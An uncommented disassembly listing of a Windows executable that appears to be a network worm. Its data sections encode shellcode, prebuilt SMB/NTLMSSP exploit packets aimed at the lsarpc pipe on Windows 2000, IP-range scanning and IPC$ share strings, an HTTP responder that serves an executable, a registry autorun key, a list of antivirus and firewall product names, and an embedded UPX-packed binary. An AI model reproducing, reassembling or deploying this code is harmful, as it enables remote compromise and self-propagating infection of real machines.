sub_41E61D proc near ; CODE XREF: sub_41E239+11C�p
jmp dword ptr ds:loc_405311+3
sub_41E61D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E629 proc near ; CODE XREF: .data:0041E20F�p
jmp dword ptr ds:loc_405316+2
sub_41E629 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E635 proc near ; CODE XREF: sub_41E239+87�p
jmp dword ptr ds:loc_40531B+1
sub_41E635 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E641 proc near ; CODE XREF: .data:0041E21C�p
jmp dword ptr ds:loc_405320
sub_41E641 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E64D proc near ; CODE XREF: .data:0041E22F�p
jmp dword ptr ds:loc_405323+1
sub_41E64D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E659 proc near ; CODE XREF: sub_41DF6A+C5�p
; sub_41DF6A+205�p
jmp dword ptr ds:loc_40532F+1
sub_41E659 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E665 proc near ; CODE XREF: sub_41DF6A+6F�p
; sub_41DF6A+82�p
jmp dword ptr ds:loc_405334
sub_41E665 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E671 proc near ; CODE XREF: sub_41DF6A+BF�p
jmp dword ptr ds:loc_405337+1
sub_41E671 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E67D proc near ; CODE XREF: sub_41DF6A+2C�p
jmp dword ptr ds:loc_405339+3
sub_41E67D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E689 proc near ; CODE XREF: sub_41DF6A+59�p
jmp dword ptr ds:loc_40533E+2
sub_41E689 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E695 proc near ; CODE XREF: sub_41DF6A+1F5�p
jmp dword ptr ds:loc_405343+1
sub_41E695 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E6A1 proc near ; CODE XREF: sub_41D13D+21�p
jmp dword ptr ds:loc_405346+2
sub_41E6A1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E6AD proc near ; CODE XREF: sub_41D13D+4B�p
; sub_41D1A8+40�p ...
jmp dword ptr ds:loc_405349+3
sub_41E6AD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E6B9 proc near ; CODE XREF: sub_41D1A8+16�p
; sub_41DF6A+1D1�p
jmp dword ptr ds:sub_405350
sub_41E6B9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E6C5 proc near ; CODE XREF: sub_41D1A8+36�p
jmp dword ptr ds:loc_405353+1
sub_41E6C5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E6D1 proc near ; CODE XREF: sub_41D13D+41�p
jmp dword ptr ds:loc_405358
sub_41E6D1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E6DD proc near ; CODE XREF: sub_41D07D+15�p
jmp dword ptr ds:loc_405364
sub_41E6DD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E6E9 proc near ; CODE XREF: .data:0041D043�p
jmp dword ptr ds:loc_405367+1
sub_41E6E9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E6F5 proc near ; CODE XREF: .data:0041DC52�p
; .data:0041DC8C�p ...
jmp dword ptr ds:loc_40536C
sub_41E6F5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E701 proc near ; CODE XREF: .data:0041D06E�p
jmp dword ptr ds:loc_405370
sub_41E701 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E70D proc near ; CODE XREF: sub_41D569+B2�p
; sub_41D569+D0�p ...
jmp dword ptr ds:loc_405370+4
sub_41E70D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E719 proc near ; CODE XREF: sub_41D569+16D�p
; sub_41D569+2E4�p ...
jmp dword ptr ds:loc_405376+2
sub_41E719 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E725 proc near ; CODE XREF: .data:0041CFC4�p
jmp dword ptr ds:loc_40537C
sub_41E725 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E731 proc near ; CODE XREF: sub_41D468:loc_41D491�p
; sub_41D468:loc_41D4EB�p ...
jmp dword ptr ds:loc_40537F+1
sub_41E731 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E73D proc near ; CODE XREF: .data:0041CF7D�p
; .data:0041CF97�p ...
jmp dword ptr ds:loc_405384
sub_41E73D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E749 proc near ; CODE XREF: .data:0041D283�p
; sub_41D468+F4�p ...
jmp dword ptr ds:loc_405387+1
sub_41E749 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E755 proc near ; CODE XREF: .data:0041DC16�p
jmp dword ptr ds:loc_40538C
sub_41E755 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E761 proc near ; CODE XREF: sub_41D07D+6B�p
; sub_41D07D+8E�p ...
jmp dword ptr ds:loc_405390
sub_41E761 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E76D proc near ; CODE XREF: sub_41E441+17�p
jmp dword ptr ds:loc_405390+4
sub_41E76D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_41E779 proc near ; CODE XREF: .data:0041D234�p
; .data:0041D250�p
jmp dword ptr ds:loc_405398
sub_41E779 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 17h dup(0)
dd 40300000h, 40311000h, 800000h, 22h dup(0)
dd 5000h, 0
dd 34303400h, 746F4E20h, 756F6620h, 2900646Eh, 0D960413Ah
dd 170A0705h, 27251F1Bh, 2AC9C5ACh, 0DF7F5F3Ch, 746845EBh
dd 2F3A7074h, 3732312Fh, 2 dup(3030302Eh), 3130302Eh, 3030303Ah
dd 662F3038h, 0AEAE6273h, 335DAE62h, 0A0B966C9h, 5758D01h
dd 68AFE8Bh, 575993Ch, 2C068A46h, 99344630h, 0E2470788h
dd 0E80AEBEDh, 0FFFFFFDAh, 99999999h, 41E41499h, 0C9994671h
dd 0C999C999h, 712FE414h, 99C9994Eh, 0F3C999C9h, 0C999F19Dh
dd 99C99989h, 0C999F1C9h, 999CC999h, 0C999F3C9h, 99988B71h
dd 67C999C9h, 10F0E3F3h, 9998931Ch, 0F3C999C9h, 414C999h
dd 0C999989Bh, 71CAC999h, 99C99963h, 0BC999C9h, 10A7C196h
dd 0C999671Ch, 0C999C999h, 9666611Ah, 0C999091Dh, 0C999C999h
dd 0C8C850B2h, 1498F3C8h, 71C941DCh, 99C99936h, 4EC999C9h
dd 1291C0A4h, 0ED599249h, 0C959B2EFh, 14C9C9C9h, 0CBCA2FC4h
dd 0C9990C71h, 0C999C999h, 21E424FFh, 0C7ED5992h, 99F1CDCDh
dd 9CC999C9h, 2C66C999h, 0C9999893h, 71C9C999h, 99C999E3h
dd 0FBC999C9h, 6683B8B0h, 9998932Ch, 66C999C9h, 0C999672Ch
dd 0C999C999h, 0C9991471h, 0C999C999h, 0E7C29C9Bh, 99672C66h
dd 99C999C9h, 99E771C9h, 99C999C9h, 31F1AC9h, 149CF3A4h
dd 99989B04h, 0CAC999C9h, 0C999F571h, 0C999C999h, 7126F434h
dd 71C998F3h, 99C999F9h, 77C999C9h, 14865973h, 496624D4h
dd 0C999CB71h, 0C999C999h, 0EF133BF9h, 0A13729F9h, 0DE9AED9Eh
dd 9E5F6072h, 5AF8C999h, 0C999A9C1h, 2 dup(0C999C999h)
dd 0B7FBEAFFh, 99FCE1FCh, 4 dup(99C999C9h), 0F934C7C9h
dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh
dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h
dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h
dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh
dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh
dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah
dd 10F885BDh, 9998971Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh
dd 0C212C999h, 85C21295h, 0C2128212h, 0FDC65A91h, 0C6EAFAh
dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 53FFA400h, 73424Dh, 18000000h, 0C807h, 3 dup(0)
dd 0FEFFh, 0FF0C0010h, 400A400h, 0A11h, 0
dd 2000h, 0D4000000h, 69800000h, 4C544E00h, 5053534Dh
dd 100h, 8829700h, 0E0h, 3 dup(0)
dd 570000h, 6E0069h, 6F0064h, 730077h, 320020h, 300030h
dd 200030h, 310032h, 350039h, 570000h, 6E0069h, 6F0064h
dd 730077h, 320020h, 300030h, 200030h, 2E0035h, 30h, 0
dd 0FFDA0000h, 73424D53h, 0
dd 0C80718h, 3 dup(0)
dd 0FEFF00h, 0C002008h, 0DA00FFh, 0A1104h, 0
dd 570000h, 0
dd 800000D4h, 544E009Fh, 53534D4Ch, 30050h, 10000h, 460001h
dd 0
dd 470000h, 0
dd 400000h, 0
dd 400000h, 60000h, 400006h, 100000h, 470010h, 8A150000h
dd 48E088h, 44004Fh, 6A198100h, 49E4F27Ah, 30AF281Ch, 67107425h
dd 69005753h, 64006E00h, 77006F00h, 20007300h, 30003200h
dd 30003000h, 32002000h, 39003100h, 3500h, 69005700h, 64006E00h
dd 77006F00h, 20007300h, 30003200h, 30003000h, 35002000h
dd 30002E00h, 2 dup(0)
dd 53FF5C00h, 75424Dh, 18000000h, 0C807h, 3 dup(0)
dd 800FEFFh, 0FF040030h, 8005C00h, 31000100h, 5C0000h
dd 31005Ch, 320039h, 31002Eh, 380036h, 31002Eh, 32002Eh
dd 300031h, 49005Ch, 430050h, 24h, 3F3F3F3Fh, 3Fh, 0FF640000h
dd 0A2424D53h, 0
dd 0C80718h, 3 dup(0)
dd 4DC08h, 18004008h, 0DEDE00FFh, 16000E00h, 0
dd 9F000000h, 201h, 2 dup(0)
dd 3000000h, 1000000h, 40000000h, 2000000h, 3000000h, 5C000011h
dd 73006C00h, 72006100h, 63007000h, 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0C000000h
dd 4D53FFF4h, 2542h, 7180000h, 0C8h, 2 dup(0)
dd 0DC080000h, 60080004h, 1000h, 0CA0h, 400h, 2 dup(0)
dd 540000h, 540CA0h, 260002h, 0CB14000h, 50005C10h, 50004900h
dd 5C004500h, 0
dd 500h, 1003h, 0CA000h, 100h, 0C8800h, 9000000h, 3EC00h
dd 0
dd 3EC00h, 14950000h, 30040h, 707C0000h, 10040h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 85780000h, 5BAB0013h, 0E9A6h, 0FFF81000h, 2F424D53h
dd 0
dd 0C80718h, 3 dup(0)
dd 0FEFF08h, 0E006008h, 0DEDE00FFh, 4000h, 0FFFF0000h
dd 8FFFFh, 10B8h, 4010B8h, 0
dd 5EE10B9h, 10010000h, 0B8000000h, 1000010h, 0C000000h
dd 20h, 0AD000900h, 0Dh, 0AD000000h, 0Dh, 0D80F0000h, 424D53FFh
dd 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 10h dup(0)
dd 460000h, 101h, 0Dh dup(0)
dd 15123C00h, 275h, 0Dh dup(0)
dd 1C123C00h, 75h, 0Eh dup(0)
dd 0EC816600h, 0E4FF071Ch, 100h, 404CF700h, 404CE900h
dd 200h, 180h, 404CF700h, 404CE000h, 100h, 180h, 404CF700h
dd 404CCF00h, 200h, 80h, 0
dd 404CB500h, 0
dd 404C9C00h, 2 dup(0)
dd 404C8C00h, 2 dup(0)
dd 404C8200h, 2 dup(0)
dd 404C6900h, 2 dup(0)
dd 404C5000h, 2 dup(0)
dd 404C4300h, 2 dup(0)
dd 404C3300h, 100h, 0
dd 404C2C00h, 100h, 4049F800h, 404C2400h, 100h, 0
dd 404C1900h, 2 dup(0)
dd 404C1200h, 100h, 0
dd 404C0C00h, 100h, 0
dd 404C0300h, 100h, 0
dd 404BFC00h, 100h, 0
dd 404BF300h, 100h, 0
dd 404BEC00h, 100h, 0
dd 404BE500h, 100h, 0
dd 404BDD00h, 100h, 0
dd 404BD700h, 100h, 404A0800h, 404BD000h, 100h, 0
dd 404BC800h, 100h, 0
dd 404BC100h, 100h, 0
dd 404BBB00h, 100h, 0
dd 404BB200h, 100h, 404A1800h, 404BAD00h, 100h, 0
dd 404BA800h, 100h, 404A2800h, 404BA200h, 100h, 0
dd 524F5700h, 6669004Dh, 6F530063h, 61777466h, 4D5C6572h
dd 6F726369h, 74666F73h, 6E69575Ch, 73776F64h, 6B005C00h
dd 6469706Ch, 706C6B00h, 6C6B0066h, 76006669h, 74616473h
dd 746E61h, 6F6D7376h, 6D6B006Eh, 78627378h, 786D6B00h
dd 7369646Eh, 786D6B00h, 736469h, 66786D6Bh, 6D6B0077h
dd 6C696678h, 6D6B0065h, 67666378h, 786D6B00h, 676962h
dd 61786D6Bh, 746E6567h, 786D5500h, 676643h, 41786D55h
dd 746E6567h, 786D5500h, 5500554Ch, 6F50786Dh, 6D53006Ch
dd 72655363h, 65636976h, 69667300h, 7265746Ch, 736E6C00h
dd 317766h, 7074754Fh, 4674736Fh, 77657269h, 6C6C61h, 72616873h
dd 63616465h, 73736563h, 41634D00h, 20656566h, 6D617246h
dd 726F7765h, 6553206Bh, 63697672h, 65440065h, 74636574h
dd 6420726Fh, 664F2065h, 65636966h, 6E616353h, 5A00544Eh
dd 41656E6Fh, 6D72616Ch, 6E615000h, 41206164h, 7669746Eh
dd 73757269h, 726F4E00h, 206E6F74h, 69746E41h, 75726976h
dd 65532073h, 63697672h, 614B0065h, 72657073h, 20796B73h
dd 69746E41h, 6361482Dh, 2E72656Bh, 6B6E6Ch, 656E6F5Ah
dd 62614C20h, 6C432073h, 746E6569h, 6F4D4100h, 6F74696Eh
dd 6F4C0072h, 27206B6Fh, 5320276Eh, 706F74h, 54464F53h
dd 45524157h, 63694D5Ch, 6F736F72h, 575C7466h, 6F646E69h
dd 435C7377h, 65727275h, 6556746Eh, 6F697372h, 75525C6Eh
dd 78006Eh, 253A7325h, 31002F75h, 312E3239h, 252E3836h
dd 75252E75h, 32373100h, 2E75252Eh, 252E7525h, 30310075h
dd 2E75252Eh, 252E7525h, 6EB0075h, 5C0006EBh, 5C73255Ch
dd 24637069h, 2E752500h, 252E7525h, 75252E75h, 54544800h
dd 2E312F50h, 30322031h, 4B4F2030h, 0A0D0A0Dh, 43000A0Dh
dd 65746E6Fh, 4C2D746Eh, 74676E65h, 25203A68h, 0D0A0D75h
dd 5448000Ah, 312F5054h, 3220312Eh, 4F203030h, 430A0D4Bh
dd 65746E6Fh, 542D746Eh, 3A657079h, 70706120h, 6163696Ch
dd 6E6F6974h, 652D782Fh, 632D6578h, 72706D6Fh, 65737365h
dd 0A0D64h, 787878h, 544547h, 300050h, 6 dup(0)
dd 50F400h, 2 dup(0)
dd 57F400h, 524C00h, 513800h, 2 dup(0)
dd 583C00h, 529000h, 514400h, 2 dup(0)
dd 584C00h, 529C00h, 515000h, 2 dup(0)
dd 585C00h, 52A800h, 51AC00h, 2 dup(0)
dd 58C000h, 530400h, 51D800h, 2 dup(0)
dd 58F000h, 533000h, 520C00h, 2 dup(0)
dd 592C00h, 536400h, 1Ah dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 2 dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 0
dd 57003000h, 74534153h, 75747261h, 70h, 61003500h, 70656363h
dd 74h, 62003600h, 646E69h, 63003700h, 65736F6Ch, 6B636F73h
dd 7465h, 63003800h, 656E6E6Fh, 7463h, 67003B00h, 6F687465h
dd 79627473h, 656D616Eh, 67003C00h, 6F687465h, 616E7473h
dd 656Dh, 68004600h, 736E6F74h, 69004700h, 5F74656Eh, 72646461h
dd 69004900h, 5F74656Eh, 616F746Eh, 6C004B00h, 65747369h
dd 6Eh, 72004F00h, 766365h, 73005500h, 646E65h, 73005900h
dd 64747568h, 6E776Fh, 73005A00h, 656B636Fh, 74h, 49008100h
dd 7265746Eh, 4774656Eh, 6F437465h, 63656E6Eh, 53646574h
dd 65746174h, 53004F00h, 74654748h, 63657053h, 466C6169h
dd 65646C6Fh, 74615072h, 4168h, 45008200h, 54746978h, 61657268h
dd 64h, 4700CA00h, 6F437465h, 6E616D6Dh, 6E694C64h, 4165h
dd 4700DE00h, 75437465h, 6E657272h, 6F725074h, 73736563h
dd 6449h, 4700F800h, 69467465h, 6953656Ch, 657Ah, 47010C00h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 43001B00h
dd 65736F6Ch, 646E6148h, 656Ch, 47015500h, 69547465h, 6F436B63h
dd 746E75h, 47015C00h, 65567465h, 6F697372h, 6Eh, 47016800h
dd 61626F6Ch, 6464416Ch, 6D6F7441h, 41h, 49019200h, 7265746Eh
dd 6B636F6Ch, 78456465h, 6E616863h, 6567h, 49019400h, 7265746Eh
dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 4C01AD00h
dd 6C61636Fh, 6F6C6C41h, 63h, 43003100h, 74616572h, 6C694665h
dd 4165h, 5201FA00h, 46646165h, 656C69h, 52020E00h, 6E556C74h
dd 646E6977h, 52020F00h, 655A6C74h, 654D6F72h, 79726F6Dh
dd 53026400h, 7065656Ch, 6C02C600h, 63727473h, 416E7970h
dd 6C02C900h, 6C727473h, 416E65h, 43004700h, 74616572h
dd 72685465h, 646165h, 44005400h, 74656C65h, 6C694665h
dd 4165h, 5300FE00h, 69547465h, 72656Dh, 52000200h, 73696765h
dd 43726574h, 7373616Ch, 41h, 47002000h, 654D7465h, 67617373h
dd 4165h, 54002400h, 736E6172h, 6574616Ch, 7373654Dh, 656761h
dd 44002500h, 61707369h, 4D686374h, 61737365h, 416567h
dd 50003D00h, 5174736Fh, 4D746975h, 61737365h, 6567h, 43004F00h
dd 74616572h, 6E695765h, 45776F64h, 4178h, 44005100h, 72747365h
dd 6957796Fh, 776F646Eh, 44005B00h, 69576665h, 776F646Eh
dd 636F7250h, 41h, 4300BF00h, 65736F6Ch, 76726553h, 48656369h
dd 6C646E61h, 65h, 4300C000h, 72746E6Fh, 65536C6Fh, 63697672h
dd 65h, 4400C300h, 74656C65h, 72655365h, 65636976h, 4F00D100h
dd 536E6570h, 6E614D43h, 72656761h, 41h, 4F00D300h, 536E6570h
dd 69767265h, 416563h, 52016700h, 65446765h, 6574656Ch
dd 756C6156h, 4165h, 52017100h, 72436765h, 65746165h, 4579654Bh
dd 4178h, 52017400h, 6C436765h, 4B65736Fh, 7965h, 52017900h
dd 704F6765h, 654B6E65h, 41784579h, 52018400h, 75516765h
dd 56797265h, 65756C61h, 417845h, 52019000h, 65536765h
dd 6C615674h, 78456575h, 41h, 5F00E800h, 616F7469h, 5F001800h
dd 7465475Fh, 6E69614Dh, 73677241h, 5F018100h, 65656C73h
dd 70h, 65020A00h, 746978h, 6D025400h, 70636D65h, 79h
dd 6D025600h, 65736D65h, 74h, 72026000h, 65736961h, 72026100h
dd 646E61h, 73026A00h, 616E6769h, 6Ch, 73026D00h, 6E697270h
dd 6674h, 73026F00h, 646E6172h, 73027100h, 61637274h, 74h
dd 73027200h, 68637274h, 72h, 73028000h, 74737274h, 72h
dd 6F737700h, 32336B63h, 6C6C642Eh, 0Fh dup(40500000h)
dd 4E495700h, 54454E49h, 4C4C442Eh, 40501400h, 45485300h
dd 32334C4Ch, 4C4C442Eh, 40502800h, 52454B00h, 334C454Eh
dd 4C442E32h, 4Ch, 15h dup(40503C00h), 45535500h, 2E323352h
dd 4C4C44h, 9 dup(40505000h), 56444100h, 33495041h, 4C442E32h
dd 4Ch, 0Bh dup(40506400h), 54524300h, 2E4C4C44h, 4C4C44h
dd 0Eh dup(40507800h), 25h dup(0)
dd 2000h, 0
dd 2000h, 100000h, 2A0000h, 300000h, 480000h, 0
dword_420004 dd 0 ; sub_402CB2+1D�r ...
dword_420008 dd 0 dword_42000C dd 0 ; sub_404211:loc_404234�r ...
dword_420010 dd 0 ; sub_40414B+11�r ...
dword_420014 dd 0FFFFh ; sub_404211+B9�r ...
dword_420018 dd 1 ; sub_404F53+C�o
byte_42001C db 0 ; DATA XREF: sub_404DE5+7�r
align 2
word_42001E dw 0FFFFh ; DATA XREF: sub_404ED7+5�o
dd 4F2AFFFFh, 4F350040h
db 40h, 0
word_42002A dw 5A4Dh ; DATA XREF: sub_40523F:loc_405299�o
dd 30090h, 40000h, 0FFFF0000h, 0B80000h, 0
dd 400000h, 8 dup(0)
dd 0C80000h, 1F0E0000h, 0B4000EBAh, 0B821CD09h, 21CD4C01h
dd 73696854h, 6F727020h, 6D617267h, 6E616320h, 20746F6Eh
dd 72206562h, 69206E75h, 4F44206Eh, 6F6D2053h, 0D2E6564h
dd 240A0Dh, 13h dup(0)
dd 45500000h, 14C0000h, 88F20003h, 41CAh, 0
dd 0E00000h, 10B010Fh, 40000006h, 10000000h, 50000000h
dd 98200000h, 60000000h, 0A0000000h, 0
dd 10000040h, 2000000h, 40000h, 0
dd 40000h, 0
dd 0B0000000h, 10000000h, 0
dd 20000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 0A0000000h, 0D80000h, 1Ch dup(0)
dd 50550000h, 3058h, 50000000h, 10000000h, 0
dd 4000000h, 3 dup(0)
dd 800000h, 5055E000h, 3158h, 40000000h, 60000000h, 3A000000h
dd 4000000h, 3 dup(0)
dd 400000h, 5055E000h, 3258h, 10000000h, 0A0000000h, 2000000h
dd 3E000000h, 3 dup(0)
dd 400000h, 0C000h, 42h dup(0)
db 0Ah
align 2
aInfoThisFileIs db '$Info: This file is packed with the UPX executable packer http://'
db 'upx.tsx.org $',0Ah,0
aIdUpx1_07Copyr db '$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Re'
db 'served. $',0Ah,0
dw 5055h
dd 90C2158h, 0A530902h, 0A837A262h, 72695F94h, 381F0000h
dd 70000000h, 4260000h, 7EE93800h, 4D009208h, 300905Ah
dd 3200043Bh, 0FFFFB2C8h, 0F97F40B8h, 4C8377Fh, 0EBA1F0Eh
dd 0CD09B400h, 4C01B821h, 73696854h, 0FDBF7020h, 6F72FFFFh
dd 6D617267h, 6E616320h, 20746F6Eh, 72206562h, 69206E75h
dd 534F4402h, 50ED6D20h, 646FFF60h, 0D0D2E65h, 50C7240Ah
dd 0DBED1345h, 14CFF21h, 888A0002h, 9DE041CAh, 6010B21h
dd 7EE90F08h, 0E022B3h, 10E018A4h, 0F9257325h, 20B6366h
dd 604501Eh, 0C96E676h, 710341Eh, 0F65E5920h, 29E0A006h
dd 0B2017578h, 17C6FDDh, 4D3864D8h, 37903F76h, 7865742Eh
dd 20A22B74h, 96CB6FFBh, 41A00EBh, 65722EE0h, 0CC636F6Ch
dd 677BECA6h, 2623FB9Eh, 107942A2h, 3703D95h, 2CDB3034h
dd 1226669Bh, 46E22FFAh, 9A691B30h, 0B423BAEh, 5E14032Ch
dd 0CD34D36Eh, 562C4AB2h, 4D867062h, 9C4D34D3h, 0E2D4C2AEh
dd 59AE9AF2h, 182D0836h, 463C0728h, 69A69A69h, 786C6254h
dd 9A69B28Eh, 0C6B49EA6h, 4D2F02E2h, 0F4CDB9D3h, 3972E0Ah
dd 344C3C24h, 5C34D34Dh, 9A8A7C6Ah, 0D34D34DBh, 0E6CEC0AAh
dd 59BF2EF2h, 243BA776h, 0F4031087h, 69A6E42Bh, 0CAD4A69Ah
dd 0BAACB6C0h, 0A29A6D60h, 0D72B9098h, 7B66B27Fh, 9603E9B6h
dd 78132F8Ah, 0FF880330h, 66D217FFh, 4F538130h, 41575446h
dd 4D5C4552h, 6F726369h, 0E5666F73h, 74FFFFFFh, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 0FB7F6853h, 536CDB6Fh, 6528760Ch, 656A624Fh, 10447463h
dd 6F4C7961h, 0AD6E6461h, 39477015h, 6739082Bh, 0A5FF3F4Dh
